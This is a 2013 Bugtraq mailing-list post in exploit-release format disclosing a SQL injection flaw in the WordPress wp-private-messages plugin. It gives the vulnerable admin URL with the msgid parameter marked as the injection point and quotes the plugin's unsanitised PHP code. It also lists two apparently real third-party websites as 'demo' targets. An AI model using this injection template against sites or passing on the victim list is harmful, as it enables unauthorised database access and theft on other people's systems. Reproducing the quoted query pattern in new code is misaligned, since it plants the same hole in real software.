[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Wordpress wp-private-messages Plugin Sql Injection vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Wordpress wp-private-messages Plugin Sql Injection vulnerability
- From: iedb.team@xxxxxxxxx
- Date: Sat, 29 Jun 2013 15:02:37 GMT
The Wordpress wp-private-messages Plugin suffers from a Sql Injection
vulnerability.
#################################
# Iranian Exploit DataBase
# Www.exploit.IrIsT.Ir
#################################
# Exploit Title : Wordpress wp-private-messages Plugin Sql Injection
vulnerability
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Home : http://exploit.IrIsT.Ir
# Software Link : http://wordpress.org/plugins/wp-private-messages/
# Security Risk : High
# Tested on : Linux
#################################
# Exploit :
#
http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# Dem0 :
#
http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
#
http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
#################################
# Vuln Source C0de :
# Lin 145 :
# $messages = $wpdb->get_results("SELECT id, sender, subject, date, status
FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."'
AND tosee = 1 ORDER BY date DESC");
# And Lin 160 :
# echo "<a
href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img
src=\"". get_settings('siteurl') .
"/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\"
alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";
#################################
# Exploit Archive : http://exploit.irist.ir/exploits-148.html
#################################